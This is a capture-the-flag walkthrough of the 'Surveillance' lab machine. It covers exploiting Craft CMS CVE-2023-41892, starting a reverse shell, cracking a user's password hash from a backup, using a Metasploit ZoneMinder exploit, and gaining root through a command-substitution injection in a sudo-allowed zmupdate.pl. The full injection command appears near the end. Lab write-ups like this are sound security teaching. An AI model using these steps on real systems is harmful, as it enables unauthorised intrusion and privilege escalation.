Surveillance
Created by TheCyberGeek & TRX
Last updated
The following post by 0xb0b is licensed under CC BY 4.0
We start with an Nmap scan and find only two open ports: 22 with SSH and a web server on port 80.
When enumerating directories, we find no direct hits except for the /admin directory.
The main site has nothing else to offer us in the way of entry points.
When we look at the /admin page, we see that we are dealing with Craft CMS.
Looking through the source of the index page, we see that it is Craft CMS version 4.4.14.
We can get an idea of the CMS on GitHub:
And we seem to be dealing with a very old version. We probably have an entry point into the system after all. Let's take a look at what vulnerabilities there are.
This Craft CMS version has an unauthenticated remote code execution vulnerability, CVE-2023-41892.
The following gist shows us a PoC, which, unfortunately, did not work right away:
Looking at the Craft CMS documentation, we see that the exploit does not take the resource base path into account. We have to edit this in the PoC.
We make the following adjustments:
Furthermore, the query for uploading seems to be defective.
After customizing and executing the PoC, we receive a web shell that we can conveniently use from the terminal. We are the user www-data. However, for the time being, we cannot find a flag in this user's home directory.
Next, we upgrade our web shell to an interactive shell. We use revshells.com to generate a reverse shell payload.
After our reverse shell connects...
... we upgrade the reverse shell:
In addition to www-data, we also have the users matthew and zoneminder. Since we can't find a user flag as www-data, we have to move laterally and get access to one of these users.
In /html/craft/storage/backup, we find a database backup packed as a zip. This could contain sensitive information that would allow us to switch to one of the other users. We unpack the zip.
We search the file using strings and grep, and find what we are looking for when searching for admin: the password hash (SHA2-256) of matthew.
Using hashcat, we crack the hash with mode 1400 for SHA2-256.
Next, we log in via SSH with matthew's credentials and find the user flag in the user's home directory.
Linpeas reveals the installation of ZoneMinder. ZoneMinder is an open-source video surveillance software designed for monitoring and recording security cameras. It offers features such as motion detection, alerts, and remote access, allowing users to manage their security systems via a web interface or mobile app.
When searching for ZoneMinder-related files, we discover that it was installed via dpkg, so we can determine which version it is.
Using dpkg -s zoneminder | grep Version, we get version 1.36.32, for which we find many vulnerabilities, among them a command injection. We will probably jump from matthew to zoneminder.
We start msfconsole and look around for possible exploits. Among them, we find exploit/unix/webapp/zoneminder_snapshots, a command injection. We want to try this out, but we need access to the web interface. Maybe the instance is only listening internally.
We run netstat -tulnp on the target and see that something is listening on port 8000.
We forward the port via SSH.
And lo and behold, it is the ZoneMinder interface. We should now be able to get a reverse shell as zoneminder using msfconsole, assuming that the web service is running under the user zoneminder.
We set up the options in msfconsole.
After running the exploit, we get a meterpreter session. Spawning a shell reveals that we are indeed the user zoneminder.
When running sudo -l, we see that we can run, without a password, all applications from /bin whose names start with zm and end with .pl. Furthermore, we can pass any arguments we want to the program.
Here we could try command injection via command substitution. We familiarize ourselves with zmupdate.pl and see that we can also specify the user parameter. The --user switch is used to set the user variable in the script. Placing a command substitution inside the user variable leads to that command being executed when the script reaches the point of evaluating the user.
It is important that we pass the parameter as a single-quoted string, because '$()' is then not recognized as a command substitution by our own shell. Otherwise the substitution would be executed not in the script but in the context of the command we enter, because our own shell would expand it first. Then we would get a reverse shell as zoneminder and not as root.
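To illustrate the quoting point above, here is an added shell example (not part of the original writeup and not zmupdate.pl's own code) that mimics the two ways a script can handle a user-supplied value: the hypothetical unsafe_eval_user builds a command string from its argument and hands it to a second shell, while safe_print_user only ever treats the argument as data. With a single-quoted argument our own shell leaves $(...) untouched, so only the unsafe function executes it; with a double-quoted argument our own shell expands it before either function runs, which is exactly why the substitution would otherwise run with our own privileges.

```shell
#!/bin/sh
# Added example: mimics the difference between a script that re-parses an
# argument with a shell and one that treats it as plain data.
# Neither function is from zmupdate.pl; both are hypothetical stand-ins.

# Unsafe pattern: the argument is interpolated into a command string that a
# second shell then evaluates, so any $(...) inside it is executed there,
# with whatever privileges the script itself runs under.
unsafe_eval_user() {
    sh -c "echo \"user=$1\""
}

# Safe pattern: the argument is only ever passed as data to printf and is
# never re-parsed, so $(...) stays a literal string.
safe_print_user() {
    printf 'user=%s\n' "$1"
}

# Demonstration with a harmless marker command instead of a real script.
main() {
    # Single quotes: our own shell does not expand $(...); the value reaches
    # the functions literally.
    unsafe_eval_user '$(echo marker)'     # prints: user=marker
    safe_print_user  '$(echo marker)'     # prints: user=$(echo marker)

    # Double quotes: our own shell expands $(...) before the call, so the
    # function only ever sees the plain string "marker".
    safe_print_user  "$(echo marker)"     # prints: user=marker
}

main "$@"
```

From the defender's side, two things make this path exploitable: the sudo rule grants a wildcard command pattern with unrestricted arguments, and the script re-parses an argument through a shell. Narrowing the rule to exact script paths (and, where possible, fixed arguments) and keeping user-controlled values out of shell command strings closes both halves.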
We prepare our reverse shell and set up a listener.
After running sudo /usr/bin/zmupdate.pl --version 1.37 --user='$(/tmp/rev.sh)', our reverse shell connects and we are the user root. In the home directory of this user we find the final flag.